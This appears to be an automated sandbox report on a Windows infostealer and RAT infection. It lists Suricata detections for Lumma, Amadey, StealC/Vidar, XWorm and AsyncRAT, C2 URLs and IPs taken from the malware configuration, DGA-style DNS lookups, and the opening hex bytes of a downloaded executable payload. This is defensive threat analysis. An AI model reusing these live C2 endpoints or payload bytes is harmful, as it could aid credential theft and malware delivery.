Source: Network traffic	Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.5:56378 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059771 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.5:56378 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54714 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059772 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54714 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059646 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (guardeduppe .com) : 192.168.2.5:58414 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54715 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059769 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (guardeduppe .com) : 192.168.2.5:58414 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54718 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059772 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54718 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54721 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059772 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54721 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54722 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059772 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54722 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54726 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059772 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54726 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54724 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54728 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059772 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54728 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:54711
Source: Network traffic	Suricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.5:53600 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.5:56824 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.5:51096 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.5:57219 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.5:63280 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.5:61770 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.5:49566 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54731 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54735 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059772 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54735 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.5:57127 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54738 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54742 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54713 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059772 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.5:54713 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54744 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54882 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.5:54894 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:54870
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.2.5:54903
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 159.100.19.137:7707 -> 192.168.2.5:54903
Source: Network traffic	Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.5:54908 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:54908 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.2.5:54914
Source: Network traffic	Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 91.212.166.99:4404 -> 192.168.2.5:54894
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:54894 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 91.212.166.99:4404 -> 192.168.2.5:54894
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:54894 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 91.212.166.99:4404 -> 192.168.2.5:54894
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:54894 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:54736 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:54726 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54756 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:54753 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:54714 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:54714 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54790 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54808 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:54750 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54822 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54822 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.5.153:443 -> 192.168.2.5:54755
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54785 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54785 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54789 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54789 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54782 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:54713 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:54713 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.5.153:443 -> 192.168.2.5:54753
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:54735 -> 172.67.149.66:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54758 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54783 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54783 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54855 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54855 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54869 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54869 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54825 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54825 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54873 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54873 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54840 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54840 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54881 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54885 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54883 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54887 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54888 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54892 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54893 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54897 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54899 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54895 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54918 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54917 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.5.153:443 -> 192.168.2.5:54915
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54947 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54946 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54946 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54943 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54943 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.5.153:443 -> 192.168.2.5:54913
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54940 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:55018 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:55071 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:55071 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:55073 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:55073 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:55067 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:55067 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:55076 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:55076 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:55078 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:55078 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:55047 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:55047 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:54942 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:54942 -> 116.202.5.153:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Domain query: m.adnxs.com
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 208.95.112.1 80
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.212.166.99 4404

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.115/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: https://warlikedbeliev.org/api
Source: Malware configuration extractor	URLs: 91.212.166.99
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199820567237
Source: Malware configuration extractor	IPs: 185.215.113.43

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: breakfasutwy.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: finickypwk.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: miniatureyu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: leggelatez.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: shoefeatthe.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: DGGKjBirXBdcY.DGGKjBirXBdcY replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bloodyswif.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: guardeduppe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: thebeautylovelytop.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: washyceehsu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: savorraiykj.lat replaycode: Name error (3)

Yara detected Generic Downloader

Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.5ec73896e9.exe.34f9588.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: unknown

Network traffic detected: DNS query count 46

Source: global traffic

TCP traffic: 192.168.2.5:54894 -> 91.212.166.99:4404

Source: global traffic

TCP traffic: 192.168.2.5:54521 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:57:10 GMTContent-Type: application/octet-streamContent-Length: 1808896Last-Modified: Sat, 01 Feb 2025 15:09:15 GMTConnection: keep-aliveETag: "679e391b-1b9a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 aa c4 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 7a 69 70 6a 68 72 61 00 00 1a 00 00 60 4f 00 00 f4 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 77 6f 72 65 69 74 71 00 10 00 00 00 60 69 00 00 04 00 00 00 74 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 78 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 